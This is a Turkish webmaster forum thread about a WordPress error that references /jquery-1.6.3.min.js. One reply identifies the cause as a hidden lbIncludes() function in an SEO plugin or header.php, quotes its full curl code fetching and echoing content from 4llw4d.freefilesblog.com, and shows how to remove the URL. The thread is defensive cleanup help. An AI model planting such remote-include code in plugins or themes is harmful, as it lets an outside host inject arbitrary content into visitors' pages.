Resim:
Not Found
The requested URL /jquery-1.6.3.min.js was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2 Server atwww.jqueryc.com Port 80
Not Found The requested URL /jquery-1.6.3.min.js was not found on this server. [YARDIM] |
14 Mesajlar | 6.923 Okunma |
Resim:
Not Found
The requested URL /jquery-1.6.3.min.js was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2 Server atwww.jqueryc.com Port 80
/**
* The Header for our theme.
*
* Displays all of the section and everything up till
*
* @package WordPress
* @subpackage Twenty_Ten
* @since Twenty Ten 1.0
*/
?>
>
/*
* Print the tag based on what is being viewed.
*/
global $page, $paged;
wp_title( '|', true, 'right' );
// Add the blog name.
bloginfo( 'name' );
// Add the blog description for the home/front page.
$site_description = get_bloginfo( 'description', 'display' );
if ( $site_description && ( is_home() || is_front_page() ) )
echo " | $site_description";
// Add a page number if necessary:
if ( $paged >= 2 || $page >= 2 )
echo ' | ' . sprintf( __( 'Page %s', 'twentyten' ), max( $paged, $page ) );
?>
/* We add some JavaScript to pages with the comment form
* to support sites with threaded comments (when in use).
*/
if ( is_singular() && get_option( 'thread_comments' ) )
wp_enqueue_script( 'comment-reply' );
/* Always have wp_head() just before the closing
* tag of your theme, or you will break many plugins, which
* generally use this hook to add elements to such
* as styles, scripts, and meta tags.
*/
wp_head();
?>
>
< id="site-title">
>
// Compatibility with versions of WordPress prior to 3.4.
if ( function_exists( 'get_custom_header' ) ) {
// We need to figure out what the minimum width should be for our featured image.
// This result would be the suggested width if the theme were to implement flexible widths.
$header_image_width = get_theme_support( 'custom-header', 'width' );
} else {
$header_image_width = HEADER_IMAGE_WIDTH;
}
// Check if this is a post or page, if it has a thumbnail, and if it's a big one
if ( is_singular() && current_theme_supports( 'post-thumbnails' ) &&
has_post_thumbnail( $post->ID ) &&
( /* $src, $width, $height */ $image = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'post-thumbnail' ) ) &&
$image[1] >= $header_image_width ) :
// Houston, we have a new header image!
echo get_the_post_thumbnail( $post->ID );
elseif ( get_header_image() ) :
// Compatibility with versions of WordPress prior to 3.4.
if ( function_exists( 'get_custom_header' ) ) {
$header_image_width = get_custom_header()->width;
$header_image_height = get_custom_header()->height;
} else {
$header_image_width = HEADER_IMAGE_WIDTH;
$header_image_height = HEADER_IMAGE_HEIGHT;
}
?>
peki worpdress kendi temalarında bir değişiklik yapmadım onlarda neden bu hatayı veriyor.
-
Üyelik
21.01.2012
-
Yaş/Cinsiyet
32 / E
-
Meslek
Webmaster
-
Konum
Adana
-
Ad Soyad
G** A**
-
Mesajlar
485
-
Beğeniler
93 / 108
-
Ticaret
18, (%100)
Header.php de jquery-1.6.3.min.js linki yokki hocam ?
-
Üyelik
17.01.2012
-
Yaş/Cinsiyet
29 / E
-
Meslek
Yönetim Bilişim Sistemleri Uzm
-
Konum
-
Ad Soyad
B** S**
-
Mesajlar
925
-
Beğeniler
102 / 79
-
Ticaret
2, (%100)
Header.php de jquery-1.6.3.min.js linki yokki hocam ?
anlamadığım sorun o saten hocam neden böyle bir hata veriyor eklesem bile aynı hatayı veriyor ?
-
Üyelik
21.01.2012
-
Yaş/Cinsiyet
32 / E
-
Meslek
Webmaster
-
Konum
Adana
-
Ad Soyad
G** A**
-
Mesajlar
485
-
Beğeniler
93 / 108
-
Ticaret
18, (%100)
Seo Paketi (Plugin) kurdun mu bu yüzden hata verebiliyormuş az önce baktım netten
İstenen URL / jquery-1.6.3.min.js bu sunucuda bulunamadı. diyormuş eklenti ve header.php de
www.4llw4d.freefilesblog.com
Çözüm: Sorun 4llw4d.freefilesblog.com aşağı ve jquery-1.6.3.min.js dosya eklentisi tarafından gerekli olduğu yüklenmemiş olmasıdır. all_in_one_seo_pack.php veya header.php dosyasını açın ve aşağıdaki işlemleri yapın.
Ben bu hata kaçmak için yaptığı şey - Ben $url = “http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js” kaldırıldı; One All all_in_one_seo_pack.php dosyadan Seo Paketi (Pro) eklentisi.
Birisi header.php dosyasında bu url alabilirsiniz. Doğru dosyayı bulmak için ve o dosyanın url kaldırmak için eseridir. <
Bu url herhangi bir eklenti ya da tema dosyasında bulunabilir.
function lbIncludes() {
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
Yukarıdaki bir özgün
function lbIncludes() {
if(function_exists('curl_init'))
{
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
Ek Olarak:
Gogle çeviri kullandım bulurken ama mantik orda all_in_one_seo_pack.php veya header.php dosyalarındaki
function lbIncludes() {
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
bu aşağıdaki ile değiştirmendir.
function lbIncludes() {
if(function_exists('curl_init'))
{
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
Sorun çözülecekdir inşallah işine yarar
-
Üyelik
08.10.2011
-
Yaş/Cinsiyet
43 / E
-
Meslek
erkek giyim
-
Konum
-
-
Ad Soyad
R** U**
-
Mesajlar
159
-
Beğeniler
10 / 39
-
Ticaret
17, (%100)
s.a. aynı sorun bende mevcut
3 gündür 15 kişi bu sorunu çözemedi...
bakalım nasıl halolacak.
dosyanın yolunu bulamıyorum.
www.pierrecassi.com site adresi
Allah rızası için biri el atsın.
-
Üyelik
17.01.2012
-
Yaş/Cinsiyet
29 / E
-
Meslek
Yönetim Bilişim Sistemleri Uzm
-
Konum
-
Ad Soyad
B** S**
-
Mesajlar
925
-
Beğeniler
102 / 79
-
Ticaret
2, (%100)
pierrecassi adlı üyeden alıntı
s.a. aynı sorun bende mevcut
3 gündür 15 kişi bu sorunu çözemedi...
bakalım nasıl halolacak.
dosyanın yolunu bulamıyorum.
www.pierrecassi.com site adresi
Allah rızası için biri el atsın.
Bende herhangi bir hata görünmüyor hocam siteyi açtığım zaman ama hata varsa yollara dikkat et etmişsin belliki o zaman js kodunu kaldır bir şey değişmez ben öyle çözdüm.